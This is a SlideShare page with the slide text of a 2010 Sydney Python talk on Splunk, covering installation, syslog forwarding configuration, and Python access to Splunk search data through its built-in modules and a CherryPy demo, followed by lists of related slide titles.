SlideShare uma empresa Scribd logo

Sydney Python Presentation (October 2010) - Splunk

K
Kelvin Nicholson

This was a presentation I gave about Splunk to the Sydney Python group in October 2010. I talked in depth about modifying Splunk for interesting added functionality.

Tecnologia
1 de 14
Baixar para ler offline
Splunk and Python Sydney Python October 2010 Kelvin Nicholson
What is Splunk? “Splunk is the world’s leading software used to monitor, report and analyze live streaming IT data as well as terabytes of historical data – located on-premises or in the cloud.” -Splunk.com “Splunk is like google for log files.” -Kelvin
Installing Splunk (on Ubuntu) $ sudo dpkg -i splunk-4.1.5-85165-linux-2.6-intel.deb $ sudo splunk enable boot-start $ sudo /etc/init.d/splunk start
Splunk Welcome Screen
Configuring Splunk ● Configure Splunk to allow syslog traffic ● Configure devices to send syslog to Splunk ○ Linux (syslog-ng) destination loghost { udp("192.168.83.11" port (514)); }; log { source(s_all); destination(splunk); }; ● Cisco IOS no logging console no logging monitor logging 192.168.83.11 ● OSSEC <syslog_output> <server>192.168.83.11 </server> <port>8514</port> </syslog_output>
Splunk Search Screen
Why I Like Splunk (Abridged) ● Dashboards of Search terms ■ Security alerts “login failed for” ■ STP network issues (“LEARNING AND FORWARDING” ■ Duplex mismatches ■ Wildcard searches, e.g. “-server2k3-” ● My “WTF” filter (easy filter building) ● Beautiful trending (“cold start” AND “switch01”)
Splunk Simple Filtering
Extending Splunk with Python ● REST API. (Search only) ● Custom search command. (iplocation) ● Configuring scripted alerts. (tweet X alert) ● Directly to backend using Splunk's built-in modules. (Full module access)
Accessing Splunk Datastore kelvinn@splunk:/opt/splunk/bin$ ./splunk cmd python >>> import splunk.auth, splunk.search >>> key = splunk.auth.getSessionKey('admin','changeme') >>> my_job = splunk.search.dispatch('search sypy', namespace='search') >>> event_list = [] >>> for event in my_job.events: ... event_list.append(event.fields) ... >>> [{'_si':event_list print splunk,main, 'index': main, 'sourcetype': syslog, 'source': udp:514, '_kv': 1, 'splunk_server': splunk, '_time': 2010-10-06T19:40:37+1100, 'host': 192.168.83.5, '_sourcetype': syslog, '_raw': Oct 6 19:40:37 192.168.83.5 Oct 6 19:40:38 mini kelvinn: hello SyPy, hope you are doing well., '_serial': 0, '_cd': 0:275}, {'_si': splunk,main, 'index': main, 'sourcetype': syslog, 'source': udp:514, '_kv': 1, 'splunk_server': splunk, '_time': 2010-10-06T19:39: 33+1100, 'host': 192.168.83.5, '_sourcetype': syslog, '_raw': Oct 6 19:39:33 192.168.83.5 Oct 6 19:39:34 mini kelvinn: sypy, '_serial': 1, '_cd': 0:251}] >>> event_list[0]['_raw'] Oct 6 19:40:37 192.168.83.5 Oct 6 19:40:38 mini kelvinn: hello SyPy, hope you are doing well.
Splunk Architecture CherryPy built-in, sweet. What can we do with that?
Built-in CherryPy Fun kelvinn@splunk:/opt$ cat splunktest.py import cherrypy import splunk.auth, splunk.search def get_splunk_data(): key = splunk.auth.getSessionKey('admin','changeme') # replace with your credentials my_job = splunk.search.dispatch('search sypy', namespace='search', earliest_time='-24h') event_list = [] for event in my_job.events: event_list.append(event.raw) return event_list class HelloWorld: def index(self): splunk_list = get_splunk_data() return str(splunk_list) index.exposed = True cherrypy.config.update({'server.socket_host': '0.0.0.0', 'server.socket_port': 9999, }) kelvinn@splunk:/opt$ /opt/splunk/bin/splunk cmd python /opt/splunktest. cherrypy.quickstart(HelloWorld()) py I'm not a CherryPy expert, but it looks pretty P.S.
View CherryPy Page
Resources + Thanks Splunk introduction: http://www.splunk.com/base/Documentation/4.1.5/Installation/Splunksarchitectureandwhatgetsinstalled Splunk REST Search (with Python httplib example): http://www.splunk.com/base/Documentation/4.1.5/Developer/RESTCreateSearch Custom search command (iplocation): http://www.splunk.com/base/Documentation/latest/SearchReference/Customsearchiplocation How to write custom alerts: http://www.splunk.com/base/Documentation/4.1.5/Admin/Configurescriptedalerts Using Splunk's built-in Python modules: http://answers.splunk.com/questions/14/can-i-use-splunks-built-in-python-sdk-in-my-own-scripts Some information about Splunk's Python SDK: http://www.splunk.com/base/Documentation/4.1.5/Developer/PySDK Thanks .

Recomendados

Build your own private openstack cloud
Build your own private openstack cloudBuild your own private openstack cloud
Build your own private openstack cloudNUTC, imac
 
Docker 基本概念與指令操作
Docker 基本概念與指令操作Docker 基本概念與指令操作
Docker 基本概念與指令操作NUTC, imac
 
使用 CLI 管理 OpenStack 平台
使用 CLI 管理 OpenStack 平台使用 CLI 管理 OpenStack 平台
使用 CLI 管理 OpenStack 平台NUTC, imac
 
彭盛韶/公私協力的公共服務 - 以資料面詮釋
彭盛韶/公私協力的公共服務 - 以資料面詮釋彭盛韶/公私協力的公共服務 - 以資料面詮釋
彭盛韶/公私協力的公共服務 - 以資料面詮釋台灣資料科學年會
 
Linux configer
Linux configerLinux configer
Linux configerMD. AL AMIN
 
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpracticesConf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpracticesBrentMatlock
 
Triangle OpenStack meetup 09 2013
Triangle OpenStack meetup 09 2013Triangle OpenStack meetup 09 2013
Triangle OpenStack meetup 09 2013Dan Radez
 
Come configurare Liferay 6.0 per Oracle
Come configurare Liferay 6.0 per OracleCome configurare Liferay 6.0 per Oracle
Come configurare Liferay 6.0 per OracleAntonio Musarra
 

Recomendados

Build your own private openstack cloud
Build your own private openstack cloudBuild your own private openstack cloud
Build your own private openstack cloudNUTC, imac
 
Docker 基本概念與指令操作
Docker 基本概念與指令操作Docker 基本概念與指令操作
Docker 基本概念與指令操作NUTC, imac
 
使用 CLI 管理 OpenStack 平台
使用 CLI 管理 OpenStack 平台使用 CLI 管理 OpenStack 平台
使用 CLI 管理 OpenStack 平台NUTC, imac
 
彭盛韶/公私協力的公共服務 - 以資料面詮釋
彭盛韶/公私協力的公共服務 - 以資料面詮釋彭盛韶/公私協力的公共服務 - 以資料面詮釋
彭盛韶/公私協力的公共服務 - 以資料面詮釋台灣資料科學年會
 
Linux configer
Linux configerLinux configer
Linux configerMD. AL AMIN
 
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpracticesConf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpractices
Conf2015 d waddle_defense_pointsecurity_deploying_splunksslbestpracticesBrentMatlock
 
Triangle OpenStack meetup 09 2013
Triangle OpenStack meetup 09 2013Triangle OpenStack meetup 09 2013
Triangle OpenStack meetup 09 2013Dan Radez
 
Come configurare Liferay 6.0 per Oracle
Come configurare Liferay 6.0 per OracleCome configurare Liferay 6.0 per Oracle
Come configurare Liferay 6.0 per OracleAntonio Musarra
 
OpenStack Day 2 Operations
OpenStack Day 2 OperationsOpenStack Day 2 Operations
OpenStack Day 2 OperationsDirk Wallerstorfer
 
OpenStack Day 2 Operations (Toronto)
OpenStack Day 2 Operations (Toronto)OpenStack Day 2 Operations (Toronto)
OpenStack Day 2 Operations (Toronto)Dirk Wallerstorfer
 
Oracle Database 11g R2 Installation
Oracle Database 11g R2 InstallationOracle Database 11g R2 Installation
Oracle Database 11g R2 InstallationAnar Godjaev
 
[JAM 1.2] Design & Multitasking (Andrew Solovey)
[JAM 1.2] Design & Multitasking (Andrew Solovey)[JAM 1.2] Design & Multitasking (Andrew Solovey)
[JAM 1.2] Design & Multitasking (Andrew Solovey)Evgeny Kaziak
 
Everyone Loves a Sausage
Everyone Loves a SausageEveryone Loves a Sausage
Everyone Loves a SausageNick Jones
 
Linux basic3
Linux basic3Linux basic3
Linux basic3Hideo Amezawa
 
Cria db.sql
Cria db.sqlCria db.sql
Cria db.sqlFranciel Amorim
 
Instalasi Solr
Instalasi SolrInstalasi Solr
Instalasi SolrDwi Fajar Saputra
 
Openstack installation using rdo multi node
Openstack installation using rdo multi nodeOpenstack installation using rdo multi node
Openstack installation using rdo multi nodeNarasimha sreeram
 
Instructions
InstructionsInstructions
Instructionsds5ysm
 
Declare your infrastructure: InfraKit, LinuxKit and Moby
Declare your infrastructure: InfraKit, LinuxKit and MobyDeclare your infrastructure: InfraKit, LinuxKit and Moby
Declare your infrastructure: InfraKit, LinuxKit and MobyMoby Project
 
Build, Ship, and Run Any App, Anywhere using Docker
Build, Ship, and Run Any App, Anywhere using Docker Build, Ship, and Run Any App, Anywhere using Docker
Build, Ship, and Run Any App, Anywhere using Docker Rahulkrishnan R A
 
Kotlinのcoroutine、async/awaitと同じでしょ?って思ってたけど意外と洗練されててすごいなぁって思った話をさせてほしい
Kotlinのcoroutine、async/awaitと同じでしょ?って思ってたけど意外と洗練されててすごいなぁって思った話をさせてほしいKotlinのcoroutine、async/awaitと同じでしょ?って思ってたけど意外と洗練されててすごいなぁって思った話をさせてほしい
Kotlinのcoroutine、async/awaitと同じでしょ?って思ってたけど意外と洗練されててすごいなぁって思った話をさせてほしいTakuya Kikuchi
 
Nagios Conference 2014 - Mike Weber - Expanding NRDS Capabilities on Linux Sy...
Nagios Conference 2014 - Mike Weber - Expanding NRDS Capabilities on Linux Sy...Nagios Conference 2014 - Mike Weber - Expanding NRDS Capabilities on Linux Sy...
Nagios Conference 2014 - Mike Weber - Expanding NRDS Capabilities on Linux Sy...Nagios
 
Introduction to Sumatra
Introduction to SumatraIntroduction to Sumatra
Introduction to SumatraFelix Z. Hoffmann
 
Forensic Challenge 10 - FC5 Attack Dataset Visualization
Forensic Challenge 10 - FC5 Attack Dataset VisualizationForensic Challenge 10 - FC5 Attack Dataset Visualization
Forensic Challenge 10 - FC5 Attack Dataset VisualizationVincent Ohprecio
 
R-House (LSRC)
R-House (LSRC)R-House (LSRC)
R-House (LSRC)Fernand Galiana
 
Hadoop 2.0 cluster setup on ubuntu 14.04 (64 bit)
Hadoop 2.0 cluster setup on ubuntu 14.04 (64 bit)Hadoop 2.0 cluster setup on ubuntu 14.04 (64 bit)
Hadoop 2.0 cluster setup on ubuntu 14.04 (64 bit)Nag Arvind Gudiseva
 
DevStack: Learn OpenStack by Running OpenStack
DevStack: Learn OpenStack by Running OpenStackDevStack: Learn OpenStack by Running OpenStack
DevStack: Learn OpenStack by Running OpenStackEverett Toews
 
Hacking Mac OSX Cocoa API from Perl
Hacking Mac OSX Cocoa API from PerlHacking Mac OSX Cocoa API from Perl
Hacking Mac OSX Cocoa API from Perltypester
 
Syslog Centralization Logging with Windows ~ A techXpress Guide
Syslog Centralization Logging with Windows ~ A techXpress GuideSyslog Centralization Logging with Windows ~ A techXpress Guide
Syslog Centralization Logging with Windows ~ A techXpress GuideAbhishek Kumar
 
Ansible101
Ansible101Ansible101
Ansible101Hideki Saito
 

Mais conteúdo relacionado

Mais procurados

OpenStack Day 2 Operations (Toronto)
OpenStack Day 2 Operations (Toronto)OpenStack Day 2 Operations (Toronto)
OpenStack Day 2 Operations (Toronto)Dirk Wallerstorfer
 
Oracle Database 11g R2 Installation
Oracle Database 11g R2 InstallationOracle Database 11g R2 Installation
Oracle Database 11g R2 InstallationAnar Godjaev
 
[JAM 1.2] Design & Multitasking (Andrew Solovey)
[JAM 1.2] Design & Multitasking (Andrew Solovey)[JAM 1.2] Design & Multitasking (Andrew Solovey)
[JAM 1.2] Design & Multitasking (Andrew Solovey)Evgeny Kaziak
 
Everyone Loves a Sausage
Everyone Loves a SausageEveryone Loves a Sausage
Everyone Loves a SausageNick Jones
 
Openstack installation using rdo multi node
Openstack installation using rdo multi nodeOpenstack installation using rdo multi node
Openstack installation using rdo multi nodeNarasimha sreeram
 
Instructions
InstructionsInstructions
Instructionsds5ysm
 
Declare your infrastructure: InfraKit, LinuxKit and Moby
Declare your infrastructure: InfraKit, LinuxKit and MobyDeclare your infrastructure: InfraKit, LinuxKit and Moby
Declare your infrastructure: InfraKit, LinuxKit and MobyMoby Project
 
Build, Ship, and Run Any App, Anywhere using Docker
Build, Ship, and Run Any App, Anywhere using Docker Build, Ship, and Run Any App, Anywhere using Docker
Build, Ship, and Run Any App, Anywhere using Docker Rahulkrishnan R A
 
Kotlinのcoroutine、async/awaitと同じでしょ?って思ってたけど意外と洗練されててすごいなぁって思った話をさせてほしい
Kotlinのcoroutine、async/awaitと同じでしょ?って思ってたけど意外と洗練されててすごいなぁって思った話をさせてほしいKotlinのcoroutine、async/awaitと同じでしょ?って思ってたけど意外と洗練されててすごいなぁって思った話をさせてほしい
Kotlinのcoroutine、async/awaitと同じでしょ?って思ってたけど意外と洗練されててすごいなぁって思った話をさせてほしいTakuya Kikuchi
 
Nagios Conference 2014 - Mike Weber - Expanding NRDS Capabilities on Linux Sy...
Nagios Conference 2014 - Mike Weber - Expanding NRDS Capabilities on Linux Sy...Nagios Conference 2014 - Mike Weber - Expanding NRDS Capabilities on Linux Sy...
Nagios Conference 2014 - Mike Weber - Expanding NRDS Capabilities on Linux Sy...Nagios
 
Forensic Challenge 10 - FC5 Attack Dataset Visualization
Forensic Challenge 10 - FC5 Attack Dataset VisualizationForensic Challenge 10 - FC5 Attack Dataset Visualization
Forensic Challenge 10 - FC5 Attack Dataset VisualizationVincent Ohprecio
 
Hadoop 2.0 cluster setup on ubuntu 14.04 (64 bit)
Hadoop 2.0 cluster setup on ubuntu 14.04 (64 bit)Hadoop 2.0 cluster setup on ubuntu 14.04 (64 bit)
Hadoop 2.0 cluster setup on ubuntu 14.04 (64 bit)Nag Arvind Gudiseva
 
DevStack: Learn OpenStack by Running OpenStack
DevStack: Learn OpenStack by Running OpenStackDevStack: Learn OpenStack by Running OpenStack
DevStack: Learn OpenStack by Running OpenStackEverett Toews
 
Hacking Mac OSX Cocoa API from Perl
Hacking Mac OSX Cocoa API from PerlHacking Mac OSX Cocoa API from Perl
Hacking Mac OSX Cocoa API from Perltypester
 

Mais procurados (20)

OpenStack Day 2 Operations
OpenStack Day 2 OperationsOpenStack Day 2 Operations
OpenStack Day 2 Operations
 
OpenStack Day 2 Operations (Toronto)
OpenStack Day 2 Operations (Toronto)OpenStack Day 2 Operations (Toronto)
OpenStack Day 2 Operations (Toronto)
 
Oracle Database 11g R2 Installation
Oracle Database 11g R2 InstallationOracle Database 11g R2 Installation
Oracle Database 11g R2 Installation
 
[JAM 1.2] Design & Multitasking (Andrew Solovey)
[JAM 1.2] Design & Multitasking (Andrew Solovey)[JAM 1.2] Design & Multitasking (Andrew Solovey)
[JAM 1.2] Design & Multitasking (Andrew Solovey)
 
Everyone Loves a Sausage
Everyone Loves a SausageEveryone Loves a Sausage
Everyone Loves a Sausage
 
Linux basic3
Linux basic3Linux basic3
Linux basic3
 
Cria db.sql
Cria db.sqlCria db.sql
Cria db.sql
 
Instalasi Solr
Instalasi SolrInstalasi Solr
Instalasi Solr
 
Openstack installation using rdo multi node
Openstack installation using rdo multi nodeOpenstack installation using rdo multi node
Openstack installation using rdo multi node
 
Instructions
InstructionsInstructions
Instructions
 
Declare your infrastructure: InfraKit, LinuxKit and Moby
Declare your infrastructure: InfraKit, LinuxKit and MobyDeclare your infrastructure: InfraKit, LinuxKit and Moby
Declare your infrastructure: InfraKit, LinuxKit and Moby
 
Build, Ship, and Run Any App, Anywhere using Docker
Build, Ship, and Run Any App, Anywhere using Docker Build, Ship, and Run Any App, Anywhere using Docker
Build, Ship, and Run Any App, Anywhere using Docker
 
Kotlinのcoroutine、async/awaitと同じでしょ?って思ってたけど意外と洗練されててすごいなぁって思った話をさせてほしい
Kotlinのcoroutine、async/awaitと同じでしょ?って思ってたけど意外と洗練されててすごいなぁって思った話をさせてほしいKotlinのcoroutine、async/awaitと同じでしょ?って思ってたけど意外と洗練されててすごいなぁって思った話をさせてほしい
Kotlinのcoroutine、async/awaitと同じでしょ?って思ってたけど意外と洗練されててすごいなぁって思った話をさせてほしい
 
Nagios Conference 2014 - Mike Weber - Expanding NRDS Capabilities on Linux Sy...
Nagios Conference 2014 - Mike Weber - Expanding NRDS Capabilities on Linux Sy...Nagios Conference 2014 - Mike Weber - Expanding NRDS Capabilities on Linux Sy...
Nagios Conference 2014 - Mike Weber - Expanding NRDS Capabilities on Linux Sy...
 
Introduction to Sumatra
Introduction to SumatraIntroduction to Sumatra
Introduction to Sumatra
 
Forensic Challenge 10 - FC5 Attack Dataset Visualization
Forensic Challenge 10 - FC5 Attack Dataset VisualizationForensic Challenge 10 - FC5 Attack Dataset Visualization
Forensic Challenge 10 - FC5 Attack Dataset Visualization
 
R-House (LSRC)
R-House (LSRC)R-House (LSRC)
R-House (LSRC)
 
Hadoop 2.0 cluster setup on ubuntu 14.04 (64 bit)
Hadoop 2.0 cluster setup on ubuntu 14.04 (64 bit)Hadoop 2.0 cluster setup on ubuntu 14.04 (64 bit)
Hadoop 2.0 cluster setup on ubuntu 14.04 (64 bit)
 
DevStack: Learn OpenStack by Running OpenStack
DevStack: Learn OpenStack by Running OpenStackDevStack: Learn OpenStack by Running OpenStack
DevStack: Learn OpenStack by Running OpenStack
 
Hacking Mac OSX Cocoa API from Perl
Hacking Mac OSX Cocoa API from PerlHacking Mac OSX Cocoa API from Perl
Hacking Mac OSX Cocoa API from Perl
 

Semelhante a Sydney Python Presentation (October 2010) - Splunk

Syslog Centralization Logging with Windows ~ A techXpress Guide
Syslog Centralization Logging with Windows ~ A techXpress GuideSyslog Centralization Logging with Windows ~ A techXpress Guide
Syslog Centralization Logging with Windows ~ A techXpress GuideAbhishek Kumar
 
Splunk n-box-splunk conf-2017
Splunk n-box-splunk conf-2017Splunk n-box-splunk conf-2017
Splunk n-box-splunk conf-2017Mohamad Hassan
 
SplunkSummit 2015 - HTTP Event Collector, Simplified Developer Logging
SplunkSummit 2015 - HTTP Event Collector, Simplified Developer LoggingSplunkSummit 2015 - HTTP Event Collector, Simplified Developer Logging
SplunkSummit 2015 - HTTP Event Collector, Simplified Developer LoggingSplunk
 
Anz summit 2015 http event collector - sydney
Anz summit 2015 http event collector - sydneyAnz summit 2015 http event collector - sydney
Anz summit 2015 http event collector - sydneySplunk
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkChris Gates
 
Getting Started with Splunk Enterprise
Getting Started with Splunk EnterpriseGetting Started with Splunk Enterprise
Getting Started with Splunk EnterpriseSplunk
 
How to deploy spark instance using ansible 2.0 in fiware lab v2
How to deploy spark instance using ansible 2.0 in fiware lab v2How to deploy spark instance using ansible 2.0 in fiware lab v2
How to deploy spark instance using ansible 2.0 in fiware lab v2Fernando Lopez Aguilar
 
How to Deploy Spark Instance Using Ansible 2.0 in FIWARE Lab
How to Deploy Spark Instance Using Ansible 2.0 in FIWARE LabHow to Deploy Spark Instance Using Ansible 2.0 in FIWARE Lab
How to Deploy Spark Instance Using Ansible 2.0 in FIWARE LabFIWARE
 
The Ring programming language version 1.9 book - Part 57 of 210
The Ring programming language version 1.9 book - Part 57 of 210The Ring programming language version 1.9 book - Part 57 of 210
The Ring programming language version 1.9 book - Part 57 of 210Mahmoud Samir Fayed
 
Getting started with Splunk Breakout Session
Getting started with Splunk Breakout SessionGetting started with Splunk Breakout Session
Getting started with Splunk Breakout SessionSplunk
 
Automating with NX-OS: Let's Get Started!
Automating with NX-OS: Let's Get Started!Automating with NX-OS: Let's Get Started!
Automating with NX-OS: Let's Get Started!Cisco DevNet
 
Python para equipos de ciberseguridad(pycones)
Python para equipos de ciberseguridad(pycones)Python para equipos de ciberseguridad(pycones)
Python para equipos de ciberseguridad(pycones)Jose Manuel Ortega Candel
 
Getting Data into Splunk
Getting Data into SplunkGetting Data into Splunk
Getting Data into SplunkSplunk
 
Splunking configfiles 20211208_daniel_wilson
Splunking configfiles 20211208_daniel_wilsonSplunking configfiles 20211208_daniel_wilson
Splunking configfiles 20211208_daniel_wilsonBecky Burwell
 
Managing Oracle Enterprise Manager Cloud Control 12c with Oracle Clusterware
Managing Oracle Enterprise Manager Cloud Control 12c with Oracle ClusterwareManaging Oracle Enterprise Manager Cloud Control 12c with Oracle Clusterware
Managing Oracle Enterprise Manager Cloud Control 12c with Oracle ClusterwareLeighton Nelson
 

Semelhante a Sydney Python Presentation (October 2010) - Splunk (20)

Syslog Centralization Logging with Windows ~ A techXpress Guide
Syslog Centralization Logging with Windows ~ A techXpress GuideSyslog Centralization Logging with Windows ~ A techXpress Guide
Syslog Centralization Logging with Windows ~ A techXpress Guide
 
Ansible101
Ansible101Ansible101
Ansible101
 
Splunk n-box-splunk conf-2017
Splunk n-box-splunk conf-2017Splunk n-box-splunk conf-2017
Splunk n-box-splunk conf-2017
 
SplunkSummit 2015 - HTTP Event Collector, Simplified Developer Logging
SplunkSummit 2015 - HTTP Event Collector, Simplified Developer LoggingSplunkSummit 2015 - HTTP Event Collector, Simplified Developer Logging
SplunkSummit 2015 - HTTP Event Collector, Simplified Developer Logging
 
Anz summit 2015 http event collector - sydney
Anz summit 2015 http event collector - sydneyAnz summit 2015 http event collector - sydney
Anz summit 2015 http event collector - sydney
 
Attacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit FrameworkAttacking Oracle with the Metasploit Framework
Attacking Oracle with the Metasploit Framework
 
SNMP and splunk
SNMP and splunkSNMP and splunk
SNMP and splunk
 
Splunk
Splunk Splunk
Splunk
 
Getting Started with Splunk Enterprise
Getting Started with Splunk EnterpriseGetting Started with Splunk Enterprise
Getting Started with Splunk Enterprise
 
Splunk
SplunkSplunk
Splunk
 
How to deploy spark instance using ansible 2.0 in fiware lab v2
How to deploy spark instance using ansible 2.0 in fiware lab v2How to deploy spark instance using ansible 2.0 in fiware lab v2
How to deploy spark instance using ansible 2.0 in fiware lab v2
 
How to Deploy Spark Instance Using Ansible 2.0 in FIWARE Lab
How to Deploy Spark Instance Using Ansible 2.0 in FIWARE LabHow to Deploy Spark Instance Using Ansible 2.0 in FIWARE Lab
How to Deploy Spark Instance Using Ansible 2.0 in FIWARE Lab
 
The Ring programming language version 1.9 book - Part 57 of 210
The Ring programming language version 1.9 book - Part 57 of 210The Ring programming language version 1.9 book - Part 57 of 210
The Ring programming language version 1.9 book - Part 57 of 210
 
Getting started with Splunk Breakout Session
Getting started with Splunk Breakout SessionGetting started with Splunk Breakout Session
Getting started with Splunk Breakout Session
 
Automating with NX-OS: Let's Get Started!
Automating with NX-OS: Let's Get Started!Automating with NX-OS: Let's Get Started!
Automating with NX-OS: Let's Get Started!
 
Python para equipos de ciberseguridad(pycones)
Python para equipos de ciberseguridad(pycones)Python para equipos de ciberseguridad(pycones)
Python para equipos de ciberseguridad(pycones)
 
Getting Data into Splunk
Getting Data into SplunkGetting Data into Splunk
Getting Data into Splunk
 
Splunking configfiles 20211208_daniel_wilson
Splunking configfiles 20211208_daniel_wilsonSplunking configfiles 20211208_daniel_wilson
Splunking configfiles 20211208_daniel_wilson
 
Managing Oracle Enterprise Manager Cloud Control 12c with Oracle Clusterware
Managing Oracle Enterprise Manager Cloud Control 12c with Oracle ClusterwareManaging Oracle Enterprise Manager Cloud Control 12c with Oracle Clusterware
Managing Oracle Enterprise Manager Cloud Control 12c with Oracle Clusterware
 
Collect, summarize and notify of OpenStack's log
Collect, summarize and notify of OpenStack's logCollect, summarize and notify of OpenStack's log
Collect, summarize and notify of OpenStack's log
 

Último

Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024The Digital Insurer
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking MenDelhi Call girls
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processorsdebabhi2
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEarley Information Science
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...
Apidays Singapore 2024 - Building Digital Trust in a Digital Economy by Veron...apidays
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Breaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountBreaking the Kubernetes Kill Chain: Host Path Mount
Breaking the Kubernetes Kill Chain: Host Path MountPuma Security, LLC
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfsudhanshuwaghmare1
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 

Último (20)

Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024Finology Group – Insurtech Innovation Award 2024
Finology Group – Insurtech Innovation Award 2024
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men08448380779 Call Girls In Friends Colony Women Seeking Men
08448380779 Call Girls In Friends Colony Women Seeking Men
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
Exploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone ProcessorsExploring the Future Potential of AI-Enabled Smartphone Processors
Exploring the Future Potential of AI-Enabled Smartphone Processors
 
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
EIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptxEIS-Webinar-Prompt-Knowledge-Eng-2024-04-08.pptx
